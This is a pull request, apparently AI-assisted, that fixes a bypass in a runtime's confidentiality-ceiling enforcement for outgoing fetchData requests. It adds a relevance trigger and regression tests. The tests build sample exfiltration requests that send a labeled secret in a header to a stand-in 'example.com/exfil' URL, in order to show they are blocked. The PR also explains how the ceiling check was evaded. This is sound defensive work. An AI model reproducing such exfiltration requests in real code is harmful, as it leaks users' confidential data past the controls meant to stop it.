### PR TITLE
fix(cfc): close per-sink ceiling bypass for values pulled through schema-less links (audit item 21)

### DIFF
--- a/packages/runner/src/cfc/mod.ts
+++ b/packages/runner/src/cfc/mod.ts
@@ -56,6 +56,7 @@ export {
 export {
   flowLabelWorkExists,
   flowReadExcluded,
+  gatedSinkRequestExists,
   prepareBoundaryCommit,
 } from "./prepare.ts";
 export {

--- a/packages/runner/src/cfc/prepare.ts
+++ b/packages/runner/src/cfc/prepare.ts
@@ -1225,6 +1225,36 @@ export const flowLabelWorkExists = (
   return false;
 };
 
+/**
+ * Relevance trigger for the per-sink confidentiality ceiling (audit item 21):
+ * true when the transaction recorded a sink-request write-policy input whose
+ * sink declares a ceiling. Used by the commit chokepoint to auto-mark
+ * relevance, the same way `flowLabelWorkExists` does for the flow dial.
+ *
+ * Without this, a request assembled from a value pulled through a schema-less
+ * link never marks the transaction relevant: the materializing read carries no
+ * `ifc` schema and the read target's stored metadata is not consulted on that
+ * read path, so nothing calls `markCfcRelevant`. The transaction then commits
+ * without `prepareCfc`, and `verifySinkRequestCeilings` (which only runs inside
+ * `prepareBoundaryCommit`) never gates the egress — the request leaves carrying
+ * confidentiality outside the ceiling. Tying relevance to the egress act itself
+ * closes that gap regardless of how the request's inputs were read: the same
+ * transaction's consumed reads still supply the confidentiality the ceiling is
+ * checked against (§5.2.1 / §7.3-7.5 egress gate).
+ */
+export const gatedSinkRequestExists = (
+  tx: IExtendedStorageTransaction,
+): boolean => {
+  const state = tx.getCfcState();
+  const ceilings = state.sinkMaxConfidentiality;
+  if (ceilings === undefined) {
+    return false;
+  }
+  return state.writePolicyInputs.some((input) =>
+    input.kind === "sink-request" && ceilings[input.sink] !== undefined
+  );
+};
+
 const walkIfcSchema = (
   schema: JSONSchema,
   path: readonly string[] = [],

--- a/packages/runner/src/runtime.ts
+++ b/packages/runner/src/runtime.ts
@@ -62,6 +62,7 @@ import {
   type CfcLabelView,
   DEFAULT_SINK_MAX_CONFIDENTIALITY,
   flowLabelWorkExists,
+  gatedSinkRequestExists,
   type SinkMaxConfidentiality,
   type TrustSnapshot,
 } from "./cfc/mod.ts";
@@ -762,6 +763,14 @@ export class Runtime {
       flowLabelWorkExists(tx)
     ) {
       tx.markCfcRelevant("flow-labels");
+    }
+    // Sink-request ceiling relevance is also computed, not caller-marked
+    // (audit item 21): a request assembled from a value pulled through a
+    // schema-less link marks nothing, so without this the egress commits
+    // without `prepareCfc` and the ceiling is never checked. Independent of
+    // the flow dial — the ceiling enforces even when flow labels are off.
+    if (!state.relevant && gatedSinkRequestExists(tx)) {
+      tx.markCfcRelevant("sink-request-ceiling");
     }
     if (!state.relevant) {
       return;

--- a/packages/runner/src/storage/extended-storage-transaction.ts
+++ b/packages/runner/src/storage/extended-storage-transaction.ts
@@ -62,6 +62,7 @@ import {
   DEFAULT_CFC_FLOW_LABELS_MODE,
   flowLabelWorkExists,
   flowReadExcluded,
+  gatedSinkRequestExists,
   type ImplementationIdentity,
   type PostCommitSideEffect,
   prepareBoundaryCommit,
@@ -801,6 +802,19 @@ export class ExtendedStorageTransaction implements IExtendedStorageTransaction {
         flowLabelWorkExists(this)
       ) {
         this.markCfcRelevant("flow-labels");
+      }
+      // Sink-request ceiling relevance (audit item 21): a request built from a
+      // value pulled through a schema-less link marks nothing, so the egress
+      // would otherwise commit without prepareCfc and skip the ceiling check.
+      // Independent of the flow dial; probe only while unprepared so a
+      // post-prepare relevance flip can't invalidate an already-done digest.
+      if (
+        !this.cfcState.relevant &&
+        this.cfcState.prepare.status === "unprepared" &&
+        this.cfcState.enforcementMode !== "disabled" &&
+        gatedSinkRequestExists(this)
+      ) {
+        this.markCfcRelevant("sink-request-ceiling");
       }
       if (
         this.cfcState.relevant &&

--- a/packages/runner/src/storage/extended-storage-transaction.ts
+++ b/packages/runner/src/storage/extended-storage-transaction.ts
@@ -806,11 +806,19 @@ export class ExtendedStorageTransaction implements IExtendedStorageTransaction {
       // Sink-request ceiling relevance (audit item 21): a request built from a
       // value pulled through a schema-less link marks nothing, so the egress
       // would otherwise commit without prepareCfc and skip the ceiling check.
-      // Independent of the flow dial; probe only while unprepared so a
-      // post-prepare relevance flip can't invalidate an already-done digest.
+      // Independent of the flow dial. Unlike the flow-labels probe above this
+      // reads no stored metadata (only already-recorded policy inputs), so it
+      // is safe to fire even once `prepare` is `invalidated` — and it MUST: a
+      // late confidential read plus a late sink-request flips an early
+      // `prepared` to `invalidated` (see `invalidateCfc` triggers) while
+      // leaving `relevant` false, and without marking here the enforcement
+      // reject below is skipped and the request flushes fail-open (Codex P2 on
+      // #4070). A genuinely `prepared` transaction either was already relevant
+      // (so this guard is moot) or read nothing confidential (consumed set
+      // empty — nothing to gate), so only the non-prepared states need this.
       if (
         !this.cfcState.relevant &&
-        this.cfcState.prepare.status === "unprepared" &&
+        this.cfcState.prepare.status !== "prepared" &&
         this.cfcState.enforcementMode !== "disabled" &&
         gatedSinkRequestExists(this)
       ) {

--- a/packages/runner/test/cfc-sink-ceiling-link-read.test.ts
+++ b/packages/runner/test/cfc-sink-ceiling-link-read.test.ts
@@ -1,0 +1,207 @@
+import { afterEach, beforeEach, describe, it } from "@std/testing/bdd";
+import { expect } from "@std/expect";
+import { Identity } from "@commonfabric/identity";
+import { internSchema } from "@commonfabric/data-model/schema-hash";
+import { StorageManager } from "../src/storage/cache.deno.ts";
+import { Runtime } from "../src/runtime.ts";
+import { createTrustedBuilder } from "./support/trusted-builder.ts";
+import { setPatternEnvironment } from "../src/env.ts";
+import { enqueueSinkRequestPostCommitEffect } from "../src/cfc/sink-request.ts";
+import { createFrozenRequestSnapshot } from "../src/cfc/request-snapshot.ts";
+import type { JSONSchema } from "../src/builder/types.ts";
+
+const signer = await Identity.fromPassphrase("runner-cfc-sink-ceiling-link");
+const space = signer.did();
+
+// Audit item 21 follow-up (link-read bypass): the per-sink confidentiality
+// ceiling only runs for CFC-relevant transactions, and a labeled value pulled
+// through a schema-less link marks nothing — the consuming read schema carries
+// no ifc and the top-level read target has no stored metadata, so the
+// relevance gate in schema.ts never fires for the nested link target. The
+// request then egresses unchecked. These tests pin the leak shut at both the
+// handler level (the exact read fetchData's input materialization performs)
+// and end-to-end through a real fetchData pattern.
+const CONFIDENTIAL_SCHEMA = internSchema(
+  {
+    type: "object",
+    properties: {
+      secret: { type: "string", ifc: { confidentiality: ["medical"] } },
+    },
+    required: ["secret"],
+  } satisfies JSONSchema,
+  true,
+);
+
+const seedConfidentialCell = async (
+  runtime: Runtime,
+  id: string,
+): Promise<void> => {
+  const seed = runtime.edit();
+  const target = runtime.getCell(space, id, undefined, seed);
+  const targetId = target.getAsNormalizedFullLink().id;
+  seed.writeOrThrow({
+    space,
+    scope: "space",
+    id: targetId,
+    path: [],
+  }, {
+    value: { secret: "rosebud" },
+    cfc: {
+      version: 1,
+      schemaHash: CONFIDENTIAL_SCHEMA.taggedHashString,
+      labelMap: {
+        version: 1,
+        entries: [{
+          path: ["secret"],
+          label: { confidentiality: ["medical"] },
+        }],
+      },
+    },
+  });
+  seed.writeOrThrow({
+    space,
+    scope: "space",
+    id: `cid:${CONFIDENTIAL_SCHEMA.taggedHashString}`,
+    path: [],
+  }, { value: CONFIDENTIAL_SCHEMA.schema });
+  expect((await seed.commit()).ok).toBeDefined();
+};
+
+describe("CFC sink ceiling on values pulled through schema-less links", () => {
+  let storageManager: ReturnType<typeof StorageManager.emulate>;
+  let runtime: Runtime;
+  let originalFetch: typeof globalThis.fetch;
+  let fetchCalls: Array<{ url: string; init?: RequestInit }>;
+
+  beforeEach(() => {
+    storageManager = StorageManager.emulate({ as: signer });
+    runtime = new Runtime({
+      apiUrl: new URL(import.meta.url),
+      storageManager,
+      cfcEnforcementMode: "enforce-explicit",
+      cfcSinkMaxConfidentiality: { fetchData: [] },
+    });
+
+    fetchCalls = [];
+    originalFetch = globalThis.fetch;
+    globalThis.fetch = ((
+      input: string | URL | Request,
+      init?: RequestInit,
+    ) => {
+      const url = typeof input === "string"
+        ? input
+        : input instanceof URL
+        ? input.toString()
+        : input.url;
+      fetchCalls.push({ url, init });
+      return Promise.resolve(
+        new Response(JSON.stringify({ mocked: true }), {
+          status: 200,
+          headers: { "Content-Type": "application/json" },
+        }),
+      );
+    }) as typeof globalThis.fetch;
+  });
+
+  afterEach(async () => {
+    globalThis.fetch = originalFetch;
+    await runtime?.dispose();
+    await storageManager?.close();
+  });
+
+  it("gates a sink request built from a labeled value read without the ifc gate (handler-level)", async () => {
+    await seedConfidentialCell(runtime, "raw-read-secret");
+
+    const tx = runtime.edit();
+    const secret = runtime.getCell(space, "raw-read-secret", undefined, tx);
+    // getRaw() resolves links on the way to the target and journals a real
+    // consumed read of the labeled field, but does NOT route through
+    // validateAndTransform's ifc gate — so nothing marks the transaction
+    // CFC-relevant. This is exactly the position fetchData is in when its
+    // request-recording pass reads the already-resolved input value: the
+    // confidentiality is materialized into the request, yet the read alone
+    // leaves the transaction un-marked.
+    const token = secret.key("secret").getRaw() as string;
+    expect(token).toBe("rosebud");
+    // Precondition that makes this a faithful reproduction (not the direct-gate
+    // path already covered by cfc-sink-ceiling.test.ts): the read left the
+    // transaction non-relevant, so only the sink-request relevance trigger can
+    // pull it into prepareCfc.
+    expect(tx.getCfcState().relevant).toBe(false);
+
+    let released = false;
+    enqueueSinkRequestPostCommitEffect(
+      tx,
+      "fetchData",
+      "fetchData:raw-read",
+      createFrozenRequestSnapshot({
+        url: "https://example.com/exfil",
+        options: { headers: { "x-token": token } },
+      }),
+      "fetchData-start",
+      () => {
+        released = true;
+      },
+    );
+    runtime.prepareTxForCommit(tx);
+    const result = await tx.commit();
+
+    expect(released).toBe(false);
+    expect(result.error).toBeDefined();
+    expect(String((result.error as Error).message)).toContain(
+      "exceeds ceiling for fetchData",
+    );
+  });
+
+  it("never fires a fetchData pattern request carrying a labeled header (end-to-end)", async () => {
+    setPatternEnvironment({
+      apiUrl: new URL("http://mock-test-server.local"),
+    });
+    await seedConfidentialCell(runtime, "pattern-secret");
+
+    const { commonfabric } = createTrustedBuilder(runtime);
+    const { pattern, byRef } = commonfabric;
+    const fetchData = byRef("fetchData");
+    const testPattern = pattern<{ url: string; token: string }>(
+      ({ url, token }) =>
+        fetchData({
+          url,
+          mode: "json",
+          options: { headers: { "x-token": token } },
+        }),
+    );
+
+    const tx = runtime.edit();
+    const secret = runtime.getCell(space, "pattern-secret", undefined, tx);
+    const resultCell = runtime.getCell(
+      space,
+      "pattern-fetch-result",
+      undefined,
+      tx,
+    );
+    const result = runtime.run(
+      tx,
+      testPattern,
+      {
+        url: "http://mock-test-server.local/exfil",
+        token: secret.key("secret"),
+      } as unknown as { url: string; token: string },
+      resultCell,
+    );
+    runtime.prepareTxForCommit(tx);
+    await tx.commit();
+
+    await runtime.idle();
+    // The fetch (if any) fires from a post-commit effect and writes its result
+    // via separate transactions — give those a chance to run, then settle.
+    await new Promise((resolve) => setTimeout(resolve, 100));
+    await result.pull();
+    await runtime.idle();
+
+    // The ceiling for fetchData is empty: a request whose headers carry a
+    // value labeled ["medical"] must never reach the network.
+    expect(
+      fetchCalls.map((call) => call.init?.headers ?? null),
+    ).toEqual([]);
+  });
+});

--- a/packages/runner/test/cfc-sink-ceiling-link-read.test.ts
+++ b/packages/runner/test/cfc-sink-ceiling-link-read.test.ts
@@ -250,6 +250,14 @@ describe("CFC sink ceiling on values pulled through schema-less links", () => {
 
     expect(released).toBe(false);
     expect(result.error).toBeDefined();
+    // Assert it is specifically the CFC enforcement rejection, not some other
+    // commit error — otherwise an unrelated failure would let this regression
+    // guard pass vacuously (cubic review). The invalidated relevant tx is
+    // rejected for being not-prepared; the underlying reason names the late
+    // sink-request input that flipped it.
+    const message = String((result.error as Error).message);
+    expect(message).toContain("CFC enforcement rejected commit");
+    expect(message).toContain("not prepared");
   });
 
   it("never fires a fetchData pattern request carrying a labeled header (end-to-end)", async () => {

--- a/packages/runner/test/cfc-sink-ceiling-link-read.test.ts
+++ b/packages/runner/test/cfc-sink-ceiling-link-read.test.ts
@@ -153,6 +153,58 @@ describe("CFC sink ceiling on values pulled through schema-less links", () => {
     );
   });
 
+  it("emits the ceiling diagnostic for the same flow in observe mode", async () => {
+    // observe mode must still SEE the violation (the whole point of the
+    // relevance fix): without it the tx stays non-relevant and prepareCfc
+    // never runs, so observe would emit nothing and a deployment couldn't tell
+    // a link-laundered egress from a clean one. It commits (observe never
+    // rejects) but records the offending (sink, atom).
+    const observeStorage = StorageManager.emulate({ as: signer });
+    const observeRuntime = new Runtime({
+      apiUrl: new URL(import.meta.url),
+      storageManager: observeStorage,
+      cfcEnforcementMode: "observe",
+      cfcSinkMaxConfidentiality: { fetchData: [] },
+    });
+    try {
+      await seedConfidentialCell(observeRuntime, "observe-raw-read");
+      const tx = observeRuntime.edit();
+      const secret = observeRuntime.getCell(
+        space,
+        "observe-raw-read",
+        undefined,
+        tx,
+      );
+      const token = secret.key("secret").getRaw() as string;
+      expect(token).toBe("rosebud");
+      expect(tx.getCfcState().relevant).toBe(false);
+
+      enqueueSinkRequestPostCommitEffect(
+        tx,
+        "fetchData",
+        "fetchData:observe-raw-read",
+        createFrozenRequestSnapshot({
+          url: "https://example.com/exfil",
+          options: { headers: { "x-token": token } },
+        }),
+        "fetchData-start",
+        () => {},
+      );
+      observeRuntime.prepareTxForCommit(tx);
+      const result = await tx.commit();
+
+      expect(result.ok).toBeDefined();
+      expect(
+        tx.getCfcState().diagnostics.some((d) =>
+          d.includes("exceeds ceiling for fetchData") && d.includes("medical")
+        ),
+      ).toBe(true);
+    } finally {
+      await observeRuntime.dispose();
+      await observeStorage.close();
+    }
+  });
+
   it("never fires a fetchData pattern request carrying a labeled header (end-to-end)", async () => {
     setPatternEnvironment({
       apiUrl: new URL("http://mock-test-server.local"),

--- a/packages/runner/test/cfc-sink-ceiling-link-read.test.ts
+++ b/packages/runner/test/cfc-sink-ceiling-link-read.test.ts
@@ -205,6 +205,53 @@ describe("CFC sink ceiling on values pulled through schema-less links", () => {
     }
   });
 
+  it("fails closed on a direct commit() when the gated read and request are added after an early prepare", async () => {
+    // Codex P2 on #4070: a transaction prepared early (here on empty content,
+    // status `prepared`, relevant=false) then handed a schema-less confidential
+    // read and a gated sink-request has those additions flip `prepare` to
+    // `invalidated` while `relevant` stays false. A caller that commits through
+    // the ExtendedStorageTransaction.commit() chokepoint DIRECTLY (no
+    // prepareTxForCommit) must still mark relevance in the `invalidated` state,
+    // or the enforcement reject is skipped and the request flushes fail-open.
+    // This exercises commit()'s own probe — note there is no prepareTxForCommit
+    // call below, unlike the other cases.
+    await seedConfidentialCell(runtime, "late-add-secret");
+
+    const tx = runtime.edit();
+    // Prepare early, before any confidential read or sink request exists.
+    tx.prepareCfc();
+    expect(tx.getCfcState().prepare.status).toBe("prepared");
+
+    const secret = runtime.getCell(space, "late-add-secret", undefined, tx);
+    const token = secret.key("secret").getRaw() as string;
+    expect(token).toBe("rosebud");
+    // The post-prepare read/record path invalidated the digest but left the
+    // transaction non-relevant (the read bypassed the ifc gate).
+    expect(tx.getCfcState().relevant).toBe(false);
+
+    let released = false;
+    enqueueSinkRequestPostCommitEffect(
+      tx,
+      "fetchData",
+      "fetchData:late-add",
+      createFrozenRequestSnapshot({
+        url: "https://example.com/exfil",
+        options: { headers: { "x-token": token } },
+      }),
+      "fetchData-start",
+      () => {
+        released = true;
+      },
+    );
+    expect(tx.getCfcState().prepare.status).toBe("invalidated");
+
+    // Direct commit() — the chokepoint Codex's finding is about.
+    const result = await tx.commit();
+
+    expect(released).toBe(false);
+    expect(result.error).toBeDefined();
+  });
+
   it("never fires a fetchData pattern request carrying a labeled header (end-to-end)", async () => {
     setPatternEnvironment({
       apiUrl: new URL("http://mock-test-server.local"),


### PR DESCRIPTION
## Problem

The CFC per-sink confidentiality ceiling (`verifySinkRequestCeilings`, run inside `prepareBoundaryCommit`) only fires for **CFC-relevant** transactions. A labeled value pulled through a **schema-less link** into a sink's request marked nothing relevant: the materializing read (`fetchData`'s `snapshotFetchDataInputs` → `asSchema(fetchDataInputSchema).get()`) carries no `ifc` schema, and the resolved link target's stored metadata is **not consulted on that read path**, so nothing calls `markCfcRelevant`. The transaction then commits without `prepareCfc`, and the ceiling never gates the egress.

This affects **all initial sink requests**, not just the LLM tool loop ([#4055](https://github.com/commontoolsinc/labs/pull/4055) handled the post-commit tool-loop bypass via the observation ceiling — a different path).

### Confirmed root cause (instrumented)

With `new Runtime({ cfcEnforcementMode: "enforce-explicit", cfcSinkMaxConfidentiality: { fetchData: [] } })` and a cell whose `["secret"]` carries `{ confidentiality: ["medical"] }`, a pattern:

```ts
fetchData({ url, mode: "json", options: { headers: { "x-token": <labeled>.key("secret") } } })
```

records its `fetchData` sink-request input on a transaction that reaches `prepareTxForCommit` with `relevant === false` (flow labels off). The fetch fired with `rosebud` in the headers despite the empty ceiling. Instrumentation showed that same transaction *did* read the labeled field (`GfhZt['value','secret']`) as a real consumed read — the data was in its consumed set — but the read never tripped the `ifc`-read relevance gate.

## Fix

Tie relevance to the **egress act itself**, not to whether the input read happened to mark relevance. `gatedSinkRequestExists(tx)` is true when the transaction recorded a sink-request write-policy input whose sink declares a ceiling; the two commit chokepoints (`Runtime.prepareTxForCommit` and `ExtendedStorageTransaction.commit`) auto-mark relevance from it — the same *computed, not caller-marked* pattern `flowLabelWorkExists` already uses for the flow dial. The transaction's consumed reads still supply the confidentiality the ceiling is checked against, so the request is gated regardless of how its inputs were read. Independent of the flow-labels dial: the ceiling enforces even with flow labels off.

Because `gatedSinkRequestExists` inspects only already-recorded policy inputs (it reads no stored metadata, unlike the flow-labels probe), the `commit()` chokepoint marks relevance for `unprepared` **and** `invalidated` transactions (`prepare.status !== "prepared"`), so a late confidential-read-plus-request on a directly-committed transaction still fails closed (Codex P2 follow-up, commit `6a849503a`).

### Bounded blast radius

Inert unless a deployment declares a ceiling for a specific sink (`sinkMaxConfidentiality` defaults to `{}`), exactly matching `verifySinkRequestCeilings`' own gating. **Full runner suite: 588 passed, 0 failed.**

## Tests

New `packages/runner/test/cfc-sink-ceiling-link-read.test.ts` — each red without the fix, green with it (verified by toggling the trigger / guard):

1. **handler-level** — a labeled value read via `getRaw()` (resolves links and journals a consumed read, but bypasses the `ifc` gate, so the tx stays non-relevant — asserted) feeding a `fetchData` sink request must reject on commit.
2. **observe mode** — the same flow records the offending `(sink, atom)` diagnostic and commits (observe never rejects).
3. **direct commit() after early prepare** — a transaction prepared early, then handed the confidential read and gated request (flipping `prepare` to `invalidated`), committed through `commit()` directly must still fail closed (Codex P2 guard).
4. **end-to-end** — a real `fetchData` pattern carrying a labeled header against an empty ceiling must never reach the network (`globalThis.fetch` stubbed, **zero calls asserted**).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
